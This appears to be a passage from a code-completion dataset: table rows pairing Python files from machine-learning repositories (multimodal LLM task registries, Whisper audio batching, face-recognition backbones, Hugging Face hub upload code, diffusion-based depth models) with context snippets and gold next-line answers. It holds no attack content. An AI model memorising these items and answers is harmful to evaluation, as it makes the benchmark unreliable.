repo_name
stringlengths 7
71
| file_path
stringlengths 5
118
| context
list | import_statement
stringlengths 45
12.5k
| token_num
int64 641
99.4k
| cropped_code
stringlengths 44
17k
| all_code
stringlengths 43
754k
| next_line
stringlengths 2
330
| gold_snippet_index
int64 0
68
| created_at
stringlengths 25
25
| level
stringclasses 9
values |
---|---|---|---|---|---|---|---|---|---|---|
OPPOMKLab/u-LLaVA | tasks/image_text_pretrain.py | [
{
"identifier": "registry",
"path": "utils/registry.py",
"snippet": "class Registry:\n def register_builder(cls, name):\n def wrap(builder_cls):\n def register_model(cls, name):\n def wrap(model_cls):\n def register_processor(cls, name):\n def wrap(processor_cls):\n def register_collator(cls, name):\n def wrap(collator_cls):\n def register_task(cls, name):\n def wrap(task_cls):\n def register(cls, name, obj):\n def get_builder_class(cls, name):\n def get_model_class(cls, name):\n def get_processor_class(cls, name):\n def get_collator_class(cls, name):\n def get_task_class(cls, name):\n def list_models(cls):\n def list_processors(cls):\n def list_collators(cls):\n def list_builders(cls):\n def list_tasks(cls):\n def get_path(cls, name):\n def get(cls, name, default=None, no_warning=False):\n def unregister(cls, name):"
},
{
"identifier": "BaseTask",
"path": "tasks/base_task.py",
"snippet": "class BaseTask:\n def __init__(self, cfg):\n self.cfg = cfg\n\n @staticmethod\n def build_model(model_cfg):\n model_cls = registry.get_model_class(model_cfg.arch)\n return model_cls.from_config(model_cfg)\n\n def build_collator(self, pad_token_id):\n \"\"\"\n :param pad_token_id: tokenizer.pad_token_id\n :return: data collator\n \"\"\"\n collator_type = self.cfg.get('collator_type', 'base_collator')\n data_collator = registry.get_collator_class(collator_type)(pad_token_id)\n return data_collator\n\n @staticmethod\n def build_processors(processors_cfg):\n \"\"\"\n :param processors_cfg:\n processor:\n clip_image:\n path:\n image_size: 224\n video_train:\n n_frm: 8\n image_size: 224\n gif_train:\n n_frm: 8\n image_size: 224\n plain_box:\n precision: 3\n :return:\n \"\"\"\n processors = dict()\n for idx, name in enumerate(processors_cfg):\n datetime_print('BUILDING PROCESSOR {0}: {1}'.format(idx + 1, name))\n processor_cfg = processors_cfg[name]\n processor = registry.get_processor_class(name).from_config(processor_cfg)\n processors[name] = processor\n\n return processors\n\n @staticmethod\n def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):\n \"\"\"\n Build a dictionary of datasets, keyed by split 'train', 'valid', 'test'.\n\n :param datasets_config:\n dataset_1\n image_dir\n dataset_2\n image_dir\n :param tokenizer:\n :param processor_dict: {'clip_image': CLIPImageProcessor()}\n :param conv_type: 'conv_simple'\n Returns:\n Dictionary of torch.utils.data.Dataset objects by split.\n\n datasets: {\n 'llava_instruct': {'train': dataset, 'test': dataset},\n 'para_instruct': {'train': dataset, 'test': dataset}\n }\n \"\"\"\n datasets = dict()\n\n assert len(datasets_config) > 0, \"At least one dataset has to be specified.\"\n\n for name in datasets_config:\n dataset_config = datasets_config[name]\n\n builder = registry.get_builder_class(name)(dataset_config)\n dataset = builder.build(tokenizer, processor_dict, conv_type)\n\n datasets[name] = dataset\n\n return datasets"
},
{
"identifier": "datetime_print",
"path": "utils/tools.py",
"snippet": "def datetime_print(msg):\n print('[' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S,%f\")[:-3] + '] ' + msg)"
},
{
"identifier": "ConcatDataset",
"path": "datasets/datasets/concat_dataset.py",
"snippet": "class ConcatDataset(Dataset):\n\n def __init__(self, datasets: Sequence[BaseDataset]):\n self.concat_dataset = TorchConcatDataset(datasets)\n\n def __len__(self):\n return len(self.concat_dataset)\n\n def __getitem__(self, index):\n return self.concat_dataset[index]"
},
{
"identifier": "ConcatDatasetWithShuffle",
"path": "datasets/datasets/concat_dataset.py",
"snippet": "class ConcatDatasetWithShuffle(Subset):\n def __init__(self, datasets: Sequence[BaseDataset],\n seed=42,\n portion=1):\n self.seed = seed\n self.portion = portion\n\n dataset = TorchConcatDataset(datasets)\n target_len = int(len(dataset) * portion)\n indices = list(range(len(dataset))) * int(np.ceil(portion))\n rng = np.random.default_rng(seed)\n rng.shuffle(indices)\n indices = indices[:target_len]\n super().__init__(dataset, indices)"
}
] | from utils.registry import registry
from tasks.base_task import BaseTask
from utils.tools import datetime_print
from datasets.datasets.concat_dataset import ConcatDataset, ConcatDatasetWithShuffle | 1,500 | """
Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py
"""
@registry.register_task("image_text_pretrain")
class ImageTextPretrainTask(BaseTask):
def __init__(self, cfg):
super().__init__(cfg)
@staticmethod
def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):
"""
:param datasets_config:
:param tokenizer:
:param processor_dict: {'clip_image': CLIPImageProcessor()}
:param conv_type:
:return:
"""
assert len(datasets_config) > 0, "At least one dataset has to be specified."
if len(datasets_config) == 1:
name = list(datasets_config.keys())[0]
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
# {"train": dataset, "test": dataset}
dataset = builder.build(tokenizer, processor_dict, conv_type)
else:
shuffle = True
portion = 1
dataset_list = []
for idx, name in enumerate(datasets_config):
datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name))
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
current_dataset = builder.build(tokenizer, processor_dict, conv_type)
dataset_list.append(current_dataset)
if shuffle:
dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion)
else:
| """
Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py
"""
@registry.register_task("image_text_pretrain")
class ImageTextPretrainTask(BaseTask):
def __init__(self, cfg):
super().__init__(cfg)
@staticmethod
def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):
"""
:param datasets_config:
:param tokenizer:
:param processor_dict: {'clip_image': CLIPImageProcessor()}
:param conv_type:
:return:
"""
assert len(datasets_config) > 0, "At least one dataset has to be specified."
if len(datasets_config) == 1:
name = list(datasets_config.keys())[0]
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
# {"train": dataset, "test": dataset}
dataset = builder.build(tokenizer, processor_dict, conv_type)
else:
shuffle = True
portion = 1
dataset_list = []
for idx, name in enumerate(datasets_config):
datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name))
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
current_dataset = builder.build(tokenizer, processor_dict, conv_type)
dataset_list.append(current_dataset)
if shuffle:
dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion)
else: | dataset = ConcatDataset(dataset_list) | 3 | 2023-12-21 08:10:23+00:00 | 2k |
shashikg/WhisperS2T | whisper_s2t/data.py | [
{
"identifier": "pad_or_trim",
"path": "whisper_s2t/audio.py",
"snippet": "def pad_or_trim(array, length: int = N_SAMPLES, *, axis: int = -1):\n \"\"\"\n Pad or trim the audio array to N_SAMPLES, as expected by the encoder.\n \"\"\"\n \n if torch.is_tensor(array):\n if array.shape[axis] > length:\n array = array.index_select(\n dim=axis, index=torch.arange(length, device=array.device)\n )\n\n if array.shape[axis] < length:\n pad_widths = [(0, 0)] * array.ndim\n pad_widths[axis] = (0, length - array.shape[axis])\n array = F.pad(array, [pad for sizes in pad_widths[::-1] for pad in sizes])\n else:\n if array.shape[axis] > length:\n array = array.take(indices=range(length), axis=axis)\n\n if array.shape[axis] < length:\n pad_widths = [(0, 0)] * array.ndim\n pad_widths[axis] = (0, length - array.shape[axis])\n array = np.pad(array, pad_widths)\n \n return array"
},
{
"identifier": "audio_batch_generator",
"path": "whisper_s2t/audio.py",
"snippet": "def audio_batch_generator(audio_files):\n return THREAD_POOL_AUDIO_LOADER.imap(load_audio, audio_files)"
},
{
"identifier": "load_audio",
"path": "whisper_s2t/audio.py",
"snippet": "def load_audio(input_file, sr=16000, return_duration=False):\n \n try:\n with wave.open(input_file, 'rb') as wf:\n if (wf.getframerate() != sr) or (wf.getnchannels() != 1):\n raise Exception(\"Not a 16kHz wav mono channel file!\")\n \n frames = wf.getnframes()\n x = wf.readframes(int(frames))\n except:\n with tempfile.TemporaryDirectory() as tmpdir:\n wav_file = f\"{tmpdir}/tmp.wav\"\n ret_code = os.system(f'ffmpeg -hide_banner -loglevel panic -i {input_file} -threads 1 -acodec pcm_s16le -ac 1 -af aresample=resampler={RESAMPLING_ENGINE} -ar {sr} {wav_file} -y')\n if ret_code != 0: raise RuntimeError(\"ffmpeg failed to resample the input audio file, make sure ffmpeg is compiled properly!\")\n \n with wave.open(wav_file, 'rb') as wf:\n frames = wf.getnframes()\n x = wf.readframes(int(frames))\n \n audio_signal = np.frombuffer(x, np.int16).flatten().astype(np.float32)/32768.0\n audio_duration = len(audio_signal)/sr\n \n if return_duration:\n return audio_signal, audio_duration\n else:\n return audio_signal"
}
] | import torch
import numpy as np
from tqdm import tqdm
from .configs import *
from .audio import pad_or_trim, audio_batch_generator, load_audio | 1,229 |
def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None):
speech_duration = [end - start for start, end in start_ends]
stitched_speech_segments = []
curr_seg = [0]
curr_dur = speech_duration[0]
idx = 1
while idx < len(start_ends):
if curr_dur + speech_duration[idx] > max_len:
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
curr_seg = [idx]
curr_dur = speech_duration[idx]
else:
curr_dur += speech_duration[idx]
curr_seg.append(idx)
idx += 1
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
if max_silent_region is None:
return stitched_speech_segments
stitched_speech_segments_joined = []
for segs in stitched_speech_segments:
_segs = []
curr_seg_start_time, curr_seg_end_time = segs[0]
for i in range(1, len(segs)):
if (segs[i][0] - curr_seg_end_time) >= max_silent_region:
_segs.append((curr_seg_start_time, curr_seg_end_time))
curr_seg_start_time = segs[i][0]
curr_seg_end_time = segs[i][1]
_segs.append((curr_seg_start_time, curr_seg_end_time))
stitched_speech_segments_joined.append(_segs)
return stitched_speech_segments_joined
class WhisperDataset(torch.utils.data.Dataset):
def __init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len,
device="cuda",
dta_padding=48000,
without_timestamps=True,
use_dynamic_time_axis=False):
self.audio_files = audio_files
self.lang_codes = lang_codes
self.tasks = tasks
self.initial_prompts = initial_prompts
self.tokenizer = tokenizer
self.device = device
self.dta_padding = dta_padding
self.without_timestamps = without_timestamps
self.use_dynamic_time_axis = use_dynamic_time_axis
self.max_initial_prompt_len = max_initial_prompt_len
if type(audio_files[0]) == str:
self.get_audio_signal = self._get_audio_signal_from_file
else:
self.get_audio_signal = self._get_audio_signal_from_array
def _get_audio_signal_from_array(self, item):
return self.audio_files[item]
def _get_audio_signal_from_file(self, item):
|
def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None):
speech_duration = [end - start for start, end in start_ends]
stitched_speech_segments = []
curr_seg = [0]
curr_dur = speech_duration[0]
idx = 1
while idx < len(start_ends):
if curr_dur + speech_duration[idx] > max_len:
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
curr_seg = [idx]
curr_dur = speech_duration[idx]
else:
curr_dur += speech_duration[idx]
curr_seg.append(idx)
idx += 1
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
if max_silent_region is None:
return stitched_speech_segments
stitched_speech_segments_joined = []
for segs in stitched_speech_segments:
_segs = []
curr_seg_start_time, curr_seg_end_time = segs[0]
for i in range(1, len(segs)):
if (segs[i][0] - curr_seg_end_time) >= max_silent_region:
_segs.append((curr_seg_start_time, curr_seg_end_time))
curr_seg_start_time = segs[i][0]
curr_seg_end_time = segs[i][1]
_segs.append((curr_seg_start_time, curr_seg_end_time))
stitched_speech_segments_joined.append(_segs)
return stitched_speech_segments_joined
class WhisperDataset(torch.utils.data.Dataset):
def __init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len,
device="cuda",
dta_padding=48000,
without_timestamps=True,
use_dynamic_time_axis=False):
self.audio_files = audio_files
self.lang_codes = lang_codes
self.tasks = tasks
self.initial_prompts = initial_prompts
self.tokenizer = tokenizer
self.device = device
self.dta_padding = dta_padding
self.without_timestamps = without_timestamps
self.use_dynamic_time_axis = use_dynamic_time_axis
self.max_initial_prompt_len = max_initial_prompt_len
if type(audio_files[0]) == str:
self.get_audio_signal = self._get_audio_signal_from_file
else:
self.get_audio_signal = self._get_audio_signal_from_array
def _get_audio_signal_from_array(self, item):
return self.audio_files[item]
def _get_audio_signal_from_file(self, item): | return load_audio(self.audio_files[item]) | 2 | 2023-12-16 18:09:16+00:00 | 2k |
chinhsuanwu/ifusion | ldm/thirdp/psp/model_irse.py | [
{
"identifier": "get_blocks",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "def get_blocks(num_layers):\n\tif num_layers == 50:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=4),\n\t\t\tget_block(in_channel=128, depth=256, num_units=14),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telif num_layers == 100:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=13),\n\t\t\tget_block(in_channel=128, depth=256, num_units=30),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telif num_layers == 152:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=8),\n\t\t\tget_block(in_channel=128, depth=256, num_units=36),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telse:\n\t\traise ValueError(\"Invalid number of layers: {}. Must be one of [50, 100, 152]\".format(num_layers))\n\treturn blocks"
},
{
"identifier": "Flatten",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class Flatten(Module):\n\tdef forward(self, input):\n\t\treturn input.view(input.size(0), -1)"
},
{
"identifier": "bottleneck_IR",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class bottleneck_IR(Module):\n\tdef __init__(self, in_channel, depth, stride):\n\t\tsuper(bottleneck_IR, self).__init__()\n\t\tif in_channel == depth:\n\t\t\tself.shortcut_layer = MaxPool2d(1, stride)\n\t\telse:\n\t\t\tself.shortcut_layer = Sequential(\n\t\t\t\tConv2d(in_channel, depth, (1, 1), stride, bias=False),\n\t\t\t\tBatchNorm2d(depth)\n\t\t\t)\n\t\tself.res_layer = Sequential(\n\t\t\tBatchNorm2d(in_channel),\n\t\t\tConv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth),\n\t\t\tConv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth)\n\t\t)\n\n\tdef forward(self, x):\n\t\tshortcut = self.shortcut_layer(x)\n\t\tres = self.res_layer(x)\n\t\treturn res + shortcut"
},
{
"identifier": "bottleneck_IR_SE",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class bottleneck_IR_SE(Module):\n\tdef __init__(self, in_channel, depth, stride):\n\t\tsuper(bottleneck_IR_SE, self).__init__()\n\t\tif in_channel == depth:\n\t\t\tself.shortcut_layer = MaxPool2d(1, stride)\n\t\telse:\n\t\t\tself.shortcut_layer = Sequential(\n\t\t\t\tConv2d(in_channel, depth, (1, 1), stride, bias=False),\n\t\t\t\tBatchNorm2d(depth)\n\t\t\t)\n\t\tself.res_layer = Sequential(\n\t\t\tBatchNorm2d(in_channel),\n\t\t\tConv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n\t\t\tPReLU(depth),\n\t\t\tConv2d(depth, depth, (3, 3), stride, 1, bias=False),\n\t\t\tBatchNorm2d(depth),\n\t\t\tSEModule(depth, 16)\n\t\t)\n\n\tdef forward(self, x):\n\t\tshortcut = self.shortcut_layer(x)\n\t\tres = self.res_layer(x)\n\t\treturn res + shortcut"
},
{
"identifier": "l2_norm",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "def l2_norm(input, axis=1):\n\tnorm = torch.norm(input, 2, axis, True)\n\toutput = torch.div(input, norm)\n\treturn output"
}
] | from torch.nn import (
Linear,
Conv2d,
BatchNorm1d,
BatchNorm2d,
PReLU,
Dropout,
Sequential,
Module,
)
from ldm.thirdp.psp.helpers import (
get_blocks,
Flatten,
bottleneck_IR,
bottleneck_IR_SE,
l2_norm,
) | 1,202 | # https://github.com/eladrich/pixel2style2pixel
"""
Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch)
"""
class Backbone(Module):
def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True):
super(Backbone, self).__init__()
assert input_size in [112, 224], "input_size should be 112 or 224"
assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152"
assert mode in ["ir", "ir_se"], "mode should be ir or ir_se"
blocks = get_blocks(num_layers)
if mode == "ir":
unit_module = bottleneck_IR
elif mode == "ir_se":
| # https://github.com/eladrich/pixel2style2pixel
"""
Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch)
"""
class Backbone(Module):
def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True):
super(Backbone, self).__init__()
assert input_size in [112, 224], "input_size should be 112 or 224"
assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152"
assert mode in ["ir", "ir_se"], "mode should be ir or ir_se"
blocks = get_blocks(num_layers)
if mode == "ir":
unit_module = bottleneck_IR
elif mode == "ir_se": | unit_module = bottleneck_IR_SE | 3 | 2023-12-17 12:45:38+00:00 | 2k |
wangzhecheng/SkyScript | src/open_clip/push_to_hf_hub.py | [
{
"identifier": "create_model_from_pretrained",
"path": "src/open_clip/factory.py",
"snippet": "def create_model_from_pretrained(\n model_name: str,\n pretrained: Optional[str] = None,\n precision: str = 'fp32',\n device: Union[str, torch.device] = 'cpu',\n jit: bool = False,\n force_quick_gelu: bool = False,\n force_custom_text: bool = False,\n force_image_size: Optional[Union[int, Tuple[int, int]]] = None,\n return_transform: bool = True,\n image_mean: Optional[Tuple[float, ...]] = None,\n image_std: Optional[Tuple[float, ...]] = None,\n cache_dir: Optional[str] = None,\n):\n model = create_model(\n model_name,\n pretrained,\n precision=precision,\n device=device,\n jit=jit,\n force_quick_gelu=force_quick_gelu,\n force_custom_text=force_custom_text,\n force_image_size=force_image_size,\n cache_dir=cache_dir,\n require_pretrained=True,\n )\n\n if not return_transform:\n return model\n\n image_mean = image_mean or getattr(model.visual, 'image_mean', None)\n image_std = image_std or getattr(model.visual, 'image_std', None)\n preprocess = image_transform(\n model.visual.image_size,\n is_train=False,\n mean=image_mean,\n std=image_std,\n )\n\n return model, preprocess"
},
{
"identifier": "get_model_config",
"path": "src/open_clip/factory.py",
"snippet": "def get_model_config(model_name):\n if model_name in _MODEL_CONFIGS:\n return deepcopy(_MODEL_CONFIGS[model_name])\n else:\n return None"
},
{
"identifier": "get_tokenizer",
"path": "src/open_clip/factory.py",
"snippet": "def get_tokenizer(model_name):\n if model_name.startswith(HF_HUB_PREFIX):\n tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):])\n else:\n config = get_model_config(model_name)\n tokenizer = HFTokenizer(\n config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize\n return tokenizer"
},
{
"identifier": "HFTokenizer",
"path": "src/open_clip/tokenizer.py",
"snippet": "class HFTokenizer:\n \"\"\"HuggingFace tokenizer wrapper\"\"\"\n\n def __init__(self, tokenizer_name: str):\n from transformers import AutoTokenizer\n self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)\n\n def save_pretrained(self, dest):\n self.tokenizer.save_pretrained(dest)\n\n def __call__(self, texts: Union[str, List[str]], context_length: int = 77) -> torch.Tensor:\n # same cleaning as for default tokenizer, except lowercasing\n # adding lower (for case-sensitive tokenizers) will make it more robust but less sensitive to nuance\n if isinstance(texts, str):\n texts = [texts]\n texts = [whitespace_clean(basic_clean(text)) for text in texts]\n input_ids = self.tokenizer(\n texts,\n return_tensors='pt',\n max_length=context_length,\n padding='max_length',\n truncation=True,\n ).input_ids\n return input_ids"
}
] | import argparse
import json
import os
import torch
import safetensors.torch
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Optional, Tuple, Union
from huggingface_hub import (
create_repo,
get_hf_file_metadata,
hf_hub_download,
hf_hub_url,
repo_type_and_id_from_hf_id,
upload_folder,
list_repo_files,
)
from huggingface_hub.utils import EntryNotFoundError
from .factory import create_model_from_pretrained, get_model_config, get_tokenizer
from .tokenizer import HFTokenizer | 1,172 | """
Adapted from https://github.com/mlfoundations/open_clip. Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt
"""
try:
_has_hf_hub = True
except ImportError:
_has_hf_hub = False
try:
_has_safetensors = True
except ImportError:
_has_safetensors = False
# Default name for a weights file hosted on the Huggingface Hub.
HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl
HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version
HF_CONFIG_NAME = 'open_clip_config.json'
def save_config_for_hf(
model,
config_path: str,
model_config: Optional[dict]
):
preprocess_cfg = {
'mean': model.visual.image_mean,
'std': model.visual.image_std,
}
hf_config = {
'model_cfg': model_config,
'preprocess_cfg': preprocess_cfg,
}
with config_path.open('w') as f:
json.dump(hf_config, f, indent=2)
def save_for_hf(
model,
| """
Adapted from https://github.com/mlfoundations/open_clip. Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt
"""
try:
_has_hf_hub = True
except ImportError:
_has_hf_hub = False
try:
_has_safetensors = True
except ImportError:
_has_safetensors = False
# Default name for a weights file hosted on the Huggingface Hub.
HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl
HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version
HF_CONFIG_NAME = 'open_clip_config.json'
def save_config_for_hf(
model,
config_path: str,
model_config: Optional[dict]
):
preprocess_cfg = {
'mean': model.visual.image_mean,
'std': model.visual.image_std,
}
hf_config = {
'model_cfg': model_config,
'preprocess_cfg': preprocess_cfg,
}
with config_path.open('w') as f:
json.dump(hf_config, f, indent=2)
def save_for_hf(
model, | tokenizer: HFTokenizer, | 3 | 2023-12-19 11:50:56+00:00 | 2k |
Lavreniuk/EVP | depth/models_depth/model_vpd.py | [
{
"identifier": "UNetWrapper",
"path": "evp/models.py",
"snippet": "class UNetWrapper(nn.Module):\n def __init__(self, unet, use_attn=True, base_size=512, max_attn_size=None, attn_selector='up_cross+down_cross') -> None:\n super().__init__()\n self.unet = unet\n self.attention_store = AttentionStore(base_size=base_size // 8, max_size=max_attn_size)\n self.size16 = base_size // 32\n self.size32 = base_size // 16\n self.size64 = base_size // 8\n self.use_attn = use_attn\n if self.use_attn:\n register_attention_control(unet, self.attention_store)\n register_hier_output(unet)\n self.attn_selector = attn_selector.split('+')\n\n def forward(self, *args, **kwargs):\n if self.use_attn:\n self.attention_store.reset()\n out_list = self.unet(*args, **kwargs)\n if self.use_attn:\n avg_attn = self.attention_store.get_average_attention()\n attn16, attn32, attn64 = self.process_attn(avg_attn)\n out_list[1] = torch.cat([out_list[1], attn16], dim=1)\n out_list[2] = torch.cat([out_list[2], attn32], dim=1)\n if attn64 is not None:\n out_list[3] = torch.cat([out_list[3], attn64], dim=1)\n return out_list[::-1]\n\n def process_attn(self, avg_attn):\n attns = {self.size16: [], self.size32: [], self.size64: []}\n for k in self.attn_selector:\n for up_attn in avg_attn[k]:\n size = int(math.sqrt(up_attn.shape[1]))\n attns[size].append(rearrange(up_attn, 'b (h w) c -> b c h w', h=size))\n attn16 = torch.stack(attns[self.size16]).mean(0)\n attn32 = torch.stack(attns[self.size32]).mean(0)\n if len(attns[self.size64]) > 0:\n attn64 = torch.stack(attns[self.size64]).mean(0)\n else:\n attn64 = None\n return attn16, attn32, attn64"
},
{
"identifier": "TextAdapterDepth",
"path": "evp/models.py",
"snippet": "class TextAdapterDepth(nn.Module):\n def __init__(self, text_dim=768):\n super().__init__()\n \n self.fc = nn.Sequential(\n nn.Linear(text_dim, text_dim),\n nn.GELU(),\n nn.Linear(text_dim, text_dim)\n )\n\n def forward(self, latents, texts, gamma):\n # use the gamma to blend\n n_sen, channel = texts.shape\n bs = latents.shape[0]\n\n texts_after = self.fc(texts)\n texts = texts + gamma * texts_after\n texts = repeat(texts, 'n c -> n b c', b=1)\n return texts"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from timm.models.layers import trunc_normal_, DropPath
from mmcv.cnn import (build_conv_layer, build_norm_layer, build_upsample_layer,
constant_init, normal_init)
from omegaconf import OmegaConf
from ldm.util import instantiate_from_config
from evp.models import UNetWrapper, TextAdapterDepth | 1,279 | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# The deconvolution code is based on Simple Baseline.
# (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py)
# Modified by Zigang Geng ([email protected]).
# ------------------------------------------------------------------------------
class VPDDepthEncoder(nn.Module):
def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768,
dataset='nyu'
):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
nn.GroupNorm(16, ldm_prior[0]),
nn.ReLU(),
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
)
self.layer2 = nn.Sequential(
nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1),
)
self.out_layer = nn.Sequential(
nn.Conv2d(sum(ldm_prior), out_dim, 1),
nn.GroupNorm(16, out_dim),
nn.ReLU(),
)
self.apply(self._init_weights)
### stable diffusion layers
config = OmegaConf.load('./v1-inference.yaml')
if sd_path is None:
config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt'
else:
config.model.params.ckpt_path = f'../{sd_path}'
sd_model = instantiate_from_config(config.model)
self.encoder_vq = sd_model.first_stage_model
self.unet = UNetWrapper(sd_model.model, use_attn=False)
del sd_model.cond_stage_model
del self.encoder_vq.decoder
del self.unet.unet.diffusion_model.out
for param in self.encoder_vq.parameters():
param.requires_grad = False
if dataset == 'nyu':
| # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# The deconvolution code is based on Simple Baseline.
# (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py)
# Modified by Zigang Geng ([email protected]).
# ------------------------------------------------------------------------------
class VPDDepthEncoder(nn.Module):
def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768,
dataset='nyu'
):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
nn.GroupNorm(16, ldm_prior[0]),
nn.ReLU(),
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
)
self.layer2 = nn.Sequential(
nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1),
)
self.out_layer = nn.Sequential(
nn.Conv2d(sum(ldm_prior), out_dim, 1),
nn.GroupNorm(16, out_dim),
nn.ReLU(),
)
self.apply(self._init_weights)
### stable diffusion layers
config = OmegaConf.load('./v1-inference.yaml')
if sd_path is None:
config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt'
else:
config.model.params.ckpt_path = f'../{sd_path}'
sd_model = instantiate_from_config(config.model)
self.encoder_vq = sd_model.first_stage_model
self.unet = UNetWrapper(sd_model.model, use_attn=False)
del sd_model.cond_stage_model
del self.encoder_vq.decoder
del self.unet.unet.diffusion_model.out
for param in self.encoder_vq.parameters():
param.requires_grad = False
if dataset == 'nyu': | self.text_adapter = TextAdapterDepth(text_dim=text_dim) | 1 | 2023-12-15 14:13:59+00:00 | 2k |
penghao-wu/vstar | VisualSearch/model/owlvit/segmentation.py | [
{
"identifier": "box_ops",
"path": "VisualSearch/model/owlvit/util/box_ops.py",
"snippet": "def box_cxcywh_to_xyxy(x):\ndef box_xyxy_to_cxcywh(x):\ndef box_iou(boxes1, boxes2):\ndef generalized_box_iou(boxes1, boxes2):\ndef masks_to_boxes(masks):"
},
{
"identifier": "NestedTensor",
"path": "VisualSearch/model/owlvit/util/misc.py",
"snippet": "class NestedTensor(object):\n def __init__(self, tensors, mask: Optional[Tensor]):\n self.tensors = tensors\n self.mask = mask\n\n def to(self, device, non_blocking=False):\n # type: (Device) -> NestedTensor # noqa\n cast_tensor = self.tensors.to(device, non_blocking=non_blocking)\n mask = self.mask\n if mask is not None:\n assert mask is not None\n cast_mask = mask.to(device, non_blocking=non_blocking)\n else:\n cast_mask = None\n return NestedTensor(cast_tensor, cast_mask)\n\n def record_stream(self, *args, **kwargs):\n self.tensors.record_stream(*args, **kwargs)\n if self.mask is not None:\n self.mask.record_stream(*args, **kwargs)\n\n def decompose(self):\n return self.tensors, self.mask\n\n def __repr__(self):\n return str(self.tensors)"
},
{
"identifier": "interpolate",
"path": "VisualSearch/model/owlvit/util/misc.py",
